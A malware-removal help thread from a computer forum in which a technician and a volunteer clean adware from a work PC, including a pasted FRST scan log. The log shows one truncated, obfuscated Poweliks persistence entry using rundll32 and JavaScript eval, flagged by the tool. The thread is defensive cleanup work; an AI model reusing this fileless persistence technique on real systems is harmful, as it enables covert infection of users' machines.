Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

4682b4.com, blinkxcore and additional annoyances


  • This topic is locked This topic is locked
15 replies to this topic

#1 Calimus

Calimus

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:10:09 PM

Posted 13 October 2014 - 07:56 AM

Machine was brought to me and I've been working on it on/off for a few days.  Currently, Malwarebytes won't spit anything out on the logs as I've been deleting temp files and the like prior to running it.  However, I found some mentions in some files to 4682b4.com and blinkxcore. The user says he sees pop up's for those when he's logged in, but It looks like it's limited to his profile as nothing happens if I'm logged in.  I haven't been able to get the user to sit down with me just yet, but I had time before they arrived to run the fubar scan.  Here are the files from that.

 

I could certainly use a hand here.  This user has scattered files everywhere on the machine so I'm trying to avoid nuking the PC and reimaging.  I'll be addressing the users file saving habbits after this mess is cleaned up, but for now, if I can clean this up without playing Sherlock Holmes with his files it will buy me some time.

 

ThanksAttached File  Addition.txt   28.16KB   2 downloadsAttached File  FRST.txt   27.64KB   4 downloads

 

 



BC AdBot (Login to Remove)

 


#2 Johnny Computer

Johnny Computer

  • Malware Response Team
  • 1,739 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:127.0.0.1
  • Local time:09:09 PM

Posted 13 October 2014 - 08:23 AM

Hello Calimus-

 

My name is Johnny Computer and I will be helping you clean up your system.  Please give me some time to look over your logs and I will be back with further instructions A.S.A.P.  :)


avatar591802_2.gif"DO OR DO NOT. THERE IS NO TRY."


#3 Calimus

Calimus
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:10:09 PM

Posted 13 October 2014 - 09:35 AM

no problem Johnny, It's much appreciated.  If additional logs are needed, just let me know.



#4 Calimus

Calimus
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:10:09 PM

Posted 15 October 2014 - 05:57 AM

Any updates Johnny?



#5 Johnny Computer

Johnny Computer

  • Malware Response Team
  • 1,739 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:127.0.0.1
  • Local time:09:09 PM

Posted 15 October 2014 - 07:00 AM

Hi Calimus-
 
Sorry for the delayed response. Thank you for your patience.  Let's see if we can get this cleaned up for you.
 

Hello and    :welcome:    to BLEEPING COMPUTER

My name is Johnny Computer and I will be helping you with your malware related computer issues today   

Before we move on, please read the following points carefully.

 

§  First, I would like to inform you that most of us here at Bleeping Computer are volunteers. The logs you will be asked to submit can take time to analyze. Please try to match our commitment to you with your patience toward us.
§  Please read my instructions completely. If there is anything that you do not understand kindly ask before proceeding.
§  IMPORTANT-----> Post all logfiles as a reply rather than as an attachment. If you can not post all log files in one reply, feel free to use more posts.
§  Perform everything in the correct order. Sometimes one step requires the previous one.
§  If you have any problems while following my instructions, Stop and ask any questions you may have.
§  Please stay with me until I have notified you that your system is All Clean. Absence of symptoms does not necessarily mean your machine is clean.  
§  If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed.
§  IMPORTANT NOTE : Please do not delete, download or install anything unless instructed to do so.
DO NOT use any TOOLS such as Combofix or HijackThis fixes without supervision. Doing so could make your system inoperable and could require a full reinstall of your operating system and losing all your programs and data.
 -------------------------------------------------------------------------------------------------------
Please download  Combofix (by sUBs) and save it to your Desktop.
·        Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan.
·        Start Combofix.exe and follow its instructions.
·        Do not use the computer while the scan is running. This may cause the program to stall.
·        When finished, a log file will be displayed (that can also be found at C:\Combofix.txt).
Please copy and paste the contents of this file into your next post.

Note: If you receive an error "Illegal operation attempted on a registry key that has been marked for deletion." after the scan, just restart the computer. 
 
 --------------------------------------------------------------------------------------------------------------------------
IN YOUR NEXT REPLY I NEED:

 
1.)  Your Combofix log

2.)  How is your computer running now?  Still having the 4682b4.com and blinkxcore issues?

 

Thanks :busy:

 

avatar591802_2.gif"DO OR DO NOT. THERE IS NO TRY."


#6 Calimus

Calimus
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:10:09 PM

Posted 15 October 2014 - 10:27 AM

Ok, I'll have to run the scan tonight as the user doesn't have time for me to Bogart his machine today.



#7 Johnny Computer

Johnny Computer

  • Malware Response Team
  • 1,739 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:127.0.0.1
  • Local time:09:09 PM

Posted 15 October 2014 - 10:29 AM

Ok. Sounds good. :)

avatar591802_2.gif"DO OR DO NOT. THERE IS NO TRY."


#8 Calimus

Calimus
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:10:09 PM

Posted 16 October 2014 - 06:27 AM

Attached File  combofixreport.txt   20.79KB   4 downloads

 

Ok, here is the Combofix report from that machine.

 

 



#9 Johnny Computer

Johnny Computer

  • Malware Response Team
  • 1,739 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:127.0.0.1
  • Local time:09:09 PM

Posted 16 October 2014 - 09:38 AM

Hi Calimus-

 

Please re run FRST and copy and paste the scan results.

 

NOTE:  PLEASE COPY AND PASTE ALL LOGS INTO YOUR REPLY DO NOT ATTACH THEM UNLESS SPECIFICALLY ASKED TO DO SO

 

Thanks  :)


avatar591802_2.gif"DO OR DO NOT. THERE IS NO TRY."


#10 Calimus

Calimus
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:10:09 PM

Posted 17 October 2014 - 10:09 AM

Ok, here we go.  Sorry for the delay.

 

---------------------------------------------------------------------------------FRST File ----------------------------------------------------------------------------------------

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 16-10-2014
Ran by bashburn (administrator) on RISK2618 on 17-10-2014 11:01:09
Running from C:\TEMP\Combofix files
Loaded Profile: bashburn (Available profiles: rpass & Altiris & altirisdeploy & cyoakum1 & ktassone & wsnyder1 & bashburn & netadmin)
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 10
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(AMD) C:\Windows\System32\atiesrxx.exe
(SolarWinds) C:\Windows\dwrcs\DWRCS.EXE
(McAfee, Inc.) C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\Common Framework\naPrdMgr.exe
(Altiris, Inc.) C:\Program Files\Altiris\Dagent\dagent.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(Symantec Corporation) C:\Program Files\Altiris\Altiris Agent\AeXNSAgent.exe
(Symantec Corporation) C:\Program Files\Altiris\Altiris Agent\x86\AeXNSAgentHostSurrogate32.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Symantec Corporation) C:\Program Files\Altiris\Altiris Agent\AeXAgentUIHost.exe
(Altiris, Inc.) C:\Program Files\Altiris\Dagent\dagentui.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(SolarWinds) C:\Windows\dwrcs\DWRCST.EXE
(TechSmith Corporation) C:\Program Files (x86)\TechSmith\Snagit 11\Snagit32.exe
(Sun Microsystems, Inc.) C:\Program Files (x86)\Java\jre1.5.0_17\bin\jusched.exe
(TechSmith Corporation) C:\Program Files (x86)\TechSmith\Snagit 11\TscHelp.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\Common Framework\UdaterUI.exe
(TechSmith Corporation) C:\Program Files (x86)\TechSmith\Snagit 11\SnagPriv.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\Common Framework\McTray.exe
(TechSmith Corporation) C:\Program Files (x86)\TechSmith\Snagit 11\SnagitEditor.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\splwow64.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
() C:\ZJDEWV\AW9RT.EXE
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\SearchProtocolHost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [DagentUI] => C:\Program Files\Altiris\Dagent\dagentui.exe [848384 2012-12-13] (Altiris, Inc.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [12343400 2011-12-28] (Realtek Semiconductor)
HKLM\...\Run: [DameWare MRC Agent] => C:\Windows\dwrcs\DWRCST.exe [425832 2012-11-02] (SolarWinds)
HKLM-x32\...\Run: [Client Access Service] => C:\Program Files (x86)\IBM\Client Access\cwbsvstr.exe [14336 2010-01-15] (IBM Corporation)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Java\jre1.5.0_17\bin\jusched.exe [75264 2008-11-10] (Sun Microsystems, Inc.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [91520 2010-03-13] (Microsoft Corporation)
HKLM-x32\...\Run: [McAfeeUpdaterUI] => C:\Program Files (x86)\McAfee\Common Framework\udaterui.exe [337440 2013-12-04] (McAfee, Inc.)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-1963064-4036034935-1140883825-9640\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
AppInit_DLLs: C:\Windows\System32\AMInit64.dll => C:\Windows\System32\AMInit64.dll [74576 2014-05-23] (Symantec Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\bginfo.bat ()
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Snagit 11.lnk
ShortcutTarget: Snagit 11.lnk -> C:\Program Files (x86)\TechSmith\Snagit 11\Snagit32.exe (TechSmith Corporation)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://myorkin/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x3451C9ADF9E6CE01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Symantec Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.3001.165.105\bin\IPS\IPSBHO.DLL (Symantec Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre6\bin\ssv.dll (Sun Microsystems, Inc.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
Tcpip\Parameters: [DhcpNameServer] 10.41.16.129 10.41.32.129
 
FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @java.com/JavaPlugin -> C:\Program Files (x86)\Java\jre6\bin\plugin2\npjp2.dll (Sun Microsystems, Inc.)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\bashburn\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF HKLM-x32\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.3001.165.105\Data\IPSFF
FF Extension: Symantec Vulnerability Protection - C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.3001.165.105\Data\IPSFF [2013-11-19]
 
Chrome: 
=======
CHR Profile: C:\Users\bashburn\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\bashburn\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-11-27]
CHR Extension: (Google Drive) - C:\Users\bashburn\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-11-27]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\bashburn\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-06-18]
CHR Extension: (YouTube) - C:\Users\bashburn\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-11-27]
CHR Extension: (Google Search) - C:\Users\bashburn\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-11-27]
CHR Extension: (Google Wallet) - C:\Users\bashburn\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-11-27]
CHR Extension: (Gmail) - C:\Users\bashburn\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-11-27]
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 AeXAgentSrvHost; C:\Program Files\Altiris\Altiris Agent\x86\AeXNSAgentHostSurrogate32.exe [314088 2014-05-23] (Symantec Corporation)
R2 AeXNSClient; C:\Program Files\Altiris\Altiris Agent\AeXNSAgent.exe [2967272 2014-05-23] (Symantec Corporation)
R2 Altiris Deployment Agent; C:\Program Files\Altiris\Dagent\dagent.exe [2044416 2012-12-13] (Altiris, Inc.) [File not signed]
S3 AltirisAgentProvider; C:\Program Files\Altiris\Altiris Agent\Agents\WMIProviderAgent\AltirisAgentProvider.exe [630504 2014-05-23] (Symantec Corporation)
S3 Cwbrxd; C:\Windows\cwbrxd.exe [94208 2010-01-15] (IBM Corporation) [File not signed]
R2 dwmrcs; C:\Windows\dwrcs\DWRCS.EXE [869736 2012-11-02] (SolarWinds)
R2 McAfeeFramework; C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe [127520 2013-12-04] (McAfee, Inc.)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [50688 2011-04-13] (Hewlett-Packard) [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [66048 2011-04-13] (Hewlett-Packard) [File not signed]
S2 SepMasterService; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.3001.165.105\Bin\ccSvcHst.exe [144368 2013-05-25] (Symantec Corporation)
S4 SmartDeploy; C:\Windows\SysWOW64\SmartDeploy.exe [207136 2012-11-05] (SmartDeploy
S3 SmcService; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.3001.165.105\Bin64\Smc.exe [2316184 2013-05-25] (Symantec Corporation)
S3 SNAC; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.3001.165.105\Bin64\snac64.exe [334736 2013-05-25] (Symantec Corporation)
S3 winexesvc; C:\Windows\winexesvc.exe [19456 2014-09-05] () [File not signed]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 BHDrvx64; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.3001.165.105\Data\Definitions\BASHDefs\20141003.013\BHDrvx64.sys [1586904 2014-10-07] (Symantec Corporation)
R1 ccSettings_{E1A40A89-2B89-44FA-9E96-395B7D7F03AC}; C:\Windows\System32\Drivers\SEP\0C010BB9\00A5.105\x64\ccSetx64.sys [169048 2013-05-25] (Symantec Corporation)
R3 DwMirror; C:\Windows\System32\DRIVERS\DamewareMini.sys [5632 2008-03-14] (DameWare Development, LLC)
R1 dwvkbd; C:\Windows\System32\DRIVERS\dwvkbd64.sys [30720 2008-03-13] (DameWare)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [487216 2014-09-17] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [142640 2014-09-17] (Symantec Corporation)
R1 IDSVia64; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.3001.165.105\Data\Definitions\IPSDefs\20141015.012\IDSvia64.sys [525016 2014-09-17] (Symantec Corporation)
R3 LBAI; C:\Windows\System32\Drivers\LBAI.sys [9600 2011-12-08] (Lenovo)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-10-15] (Malwarebytes Corporation)
R3 NAVENG; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.3001.165.105\Data\Definitions\VirusDefs\20141015.003\ENG64.SYS [129752 2014-09-17] (Symantec Corporation)
R3 NAVEX15; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.3001.165.105\Data\Definitions\VirusDefs\20141015.003\EX64.SYS [2137304 2014-09-17] (Symantec Corporation)
R1 Serial; C:\Windows\System32\DRIVERS\serial.sys [94208 2009-07-13] (Brother Industries Ltd.)
R1 SRTSP; C:\Windows\System32\Drivers\SEP\0C010BB9\00A5.105\x64\SRTSP64.SYS [796760 2013-05-25] (Symantec Corporation)
R1 SRTSPX; C:\Windows\System32\Drivers\SEP\0C010BB9\00A5.105\x64\SRTSPX64.SYS [36952 2013-05-25] (Symantec Corporation)
S3 SyDvCtrl; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.3001.165.105\Bin64\SyDvCtrl64.sys [34800 2013-05-25] (Symantec Corporation)
R0 SymDS; C:\Windows\System32\Drivers\SEP\0C010BB9\00A5.105\x64\SYMDS64.SYS [493656 2013-05-25] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\Drivers\SEP\0C010BB9\00A5.105\x64\SYMEFA64.SYS [1139800 2013-05-25] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [177312 2013-11-19] (Symantec Corporation)
R1 SymIRON; C:\Windows\System32\Drivers\SEP\0C010BB9\00A5.105\x64\Ironx64.SYS [224416 2013-05-25] (Symantec Corporation)
R1 SYMNETS; C:\Windows\System32\Drivers\SEP\0C010BB9\00A5.105\x64\SYMNETS.SYS [433752 2013-05-25] (Symantec Corporation)
R1 SysPlant; C:\Windows\System32\Drivers\SysPlant.sys [159472 2013-11-19] (Symantec Corporation)
R1 Teefer2; C:\Windows\System32\DRIVERS\Teefer.sys [91944 2013-05-25] (Symantec Corporation)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-10-16 07:19 - 2014-10-16 07:19 - 00021285 _____ () C:\ComboFix.txt
2014-10-13 13:12 - 2014-10-13 14:00 - 02081522 _____ () C:\Users\bashburn\Desktop\Western Pest NY-NJ Reg MVRs 2014.xlsx
2014-10-13 08:15 - 2014-10-17 11:01 - 00000000 ____D () C:\FRST
2014-10-13 07:50 - 2014-10-13 07:50 - 00000000 ____D () C:\Users\wsnyder1\AppData\Roaming\McAfee
2014-10-08 08:14 - 2014-10-08 08:14 - 00000000 ____D () C:\Users\bashburn\AppData\Roaming\McAfee
2014-10-07 17:15 - 2014-10-07 17:15 - 07009654 _____ (McAfee, Inc.) C:\Windows\FramePkg.exe
2014-10-07 17:15 - 2014-10-07 17:15 - 00000000 ____D () C:\ProgramData\McAfee
2014-10-07 17:15 - 2014-10-07 17:15 - 00000000 ____D () C:\Program Files (x86)\McAfee
2014-10-07 16:05 - 2014-10-07 16:05 - 02077024 _____ () C:\Users\bashburn\Desktop\Rollins Risk Report (10-07-14) w- Over 8 & Invalid.xlsx
2014-10-07 07:27 - 2010-08-30 08:34 - 00536576 _____ (SQLite Development Team) C:\Windows\SysWOW64\sqlite3.dll
2014-10-07 07:26 - 2014-10-07 08:27 - 00000000 ____D () C:\AdwCleaner
2014-10-03 10:44 - 2014-10-15 08:13 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-03 10:44 - 2014-10-13 15:42 - 00001108 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-03 10:44 - 2014-10-13 15:42 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-03 10:44 - 2014-10-13 15:42 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-03 10:44 - 2014-10-01 11:11 - 00093400 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-03 10:44 - 2014-10-01 11:11 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-03 10:44 - 2014-10-01 11:11 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-10-01 14:46 - 2014-10-01 14:46 - 00109504 _____ () C:\Users\wsnyder1\AppData\Local\GDIPFONTCACHEV1.DAT
2014-10-01 14:46 - 2014-10-01 14:46 - 00002408 __RSH () C:\Users\wsnyder1\ntuser.pol
2014-10-01 14:46 - 2014-10-01 14:46 - 00001423 _____ () C:\Users\wsnyder1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-10-01 14:46 - 2014-10-01 14:46 - 00000020 ___SH () C:\Users\wsnyder1\ntuser.ini
2014-10-01 14:46 - 2014-10-01 14:46 - 00000000 ____D () C:\Users\wsnyder1\Documents\Snagit
2014-10-01 14:46 - 2014-10-01 14:46 - 00000000 ____D () C:\Users\wsnyder1\Documents\IBM
2014-10-01 14:46 - 2014-10-01 14:46 - 00000000 ____D () C:\Users\wsnyder1\AppData\Roaming\IBM
2014-10-01 14:46 - 2014-10-01 14:46 - 00000000 ____D () C:\Users\wsnyder1\AppData\Roaming\Adobe
2014-10-01 14:46 - 2014-10-01 14:46 - 00000000 ____D () C:\Users\wsnyder1\AppData\Local\TechSmith
2014-10-01 14:46 - 2014-10-01 14:46 - 00000000 ____D () C:\Users\wsnyder1\AppData\Local\Symantec
2014-10-01 14:46 - 2014-10-01 14:46 - 00000000 ____D () C:\Users\wsnyder1\AppData\Local\Google
2014-10-01 14:46 - 2014-10-01 14:46 - 00000000 ____D () C:\Users\wsnyder1
2014-10-01 14:46 - 2013-11-19 16:07 - 00000000 ____D () C:\Users\wsnyder1\AppData\Local\Microsoft Help
2014-10-01 14:46 - 2009-07-14 00:54 - 00000000 ___RD () C:\Users\wsnyder1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-10-01 14:46 - 2009-07-14 00:49 - 00000000 ___RD () C:\Users\wsnyder1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2014-10-01 14:24 - 2014-10-15 08:12 - 00003538 _____ () C:\Windows\PFRO.log
2014-10-01 14:24 - 2014-10-15 08:12 - 00000560 _____ () C:\Windows\setupact.log
2014-10-01 14:24 - 2014-10-01 14:24 - 00000000 _____ () C:\Windows\setuperr.log
2014-10-01 13:57 - 2011-06-26 02:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-10-01 13:57 - 2010-11-07 13:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-10-01 13:57 - 2009-04-20 00:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-10-01 13:57 - 2000-08-30 20:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-10-01 13:57 - 2000-08-30 20:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-10-01 13:57 - 2000-08-30 20:00 - 00098816 _____ () C:\Windows\sed.exe
2014-10-01 13:57 - 2000-08-30 20:00 - 00080412 _____ () C:\Windows\grep.exe
2014-10-01 13:57 - 2000-08-30 20:00 - 00068096 _____ () C:\Windows\zip.exe
2014-10-01 13:48 - 2014-10-16 07:20 - 00000000 ____D () C:\Qoobox
2014-10-01 13:47 - 2014-10-01 14:30 - 00000000 ____D () C:\Windows\erdnt
2014-10-01 13:45 - 2014-10-01 13:45 - 05582345 ____R (Swearware) C:\Users\cyoakum1\Downloads\ComboFix.exe
2014-10-01 13:31 - 2014-10-01 13:32 - 00000000 ____D () C:\Users\cyoakum1\Documents\Snagit
2014-10-01 13:31 - 2014-10-01 13:31 - 00109504 _____ () C:\Users\cyoakum1\AppData\Local\GDIPFONTCACHEV1.DAT
2014-10-01 13:31 - 2014-10-01 13:31 - 00002408 __RSH () C:\Users\cyoakum1\ntuser.pol
2014-10-01 13:31 - 2014-10-01 13:31 - 00001423 _____ () C:\Users\cyoakum1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-10-01 13:31 - 2014-10-01 13:31 - 00000000 ____D () C:\Users\cyoakum1\Documents\IBM
2014-10-01 13:31 - 2014-10-01 13:31 - 00000000 ____D () C:\Users\cyoakum1\AppData\Roaming\IBM
2014-10-01 13:31 - 2014-10-01 13:31 - 00000000 ____D () C:\Users\cyoakum1\AppData\Roaming\Adobe
2014-10-01 13:31 - 2014-10-01 13:31 - 00000000 ____D () C:\Users\cyoakum1\AppData\Local\TechSmith
2014-10-01 13:31 - 2014-10-01 13:31 - 00000000 ____D () C:\Users\cyoakum1\AppData\Local\Symantec
2014-10-01 13:31 - 2014-10-01 13:31 - 00000000 ____D () C:\Users\cyoakum1\AppData\Local\Google
2014-10-01 13:30 - 2014-10-01 13:31 - 00000000 ____D () C:\Users\cyoakum1
2014-10-01 13:30 - 2014-10-01 13:30 - 00000020 ___SH () C:\Users\cyoakum1\ntuser.ini
2014-10-01 13:30 - 2013-11-19 16:07 - 00000000 ____D () C:\Users\cyoakum1\AppData\Local\Microsoft Help
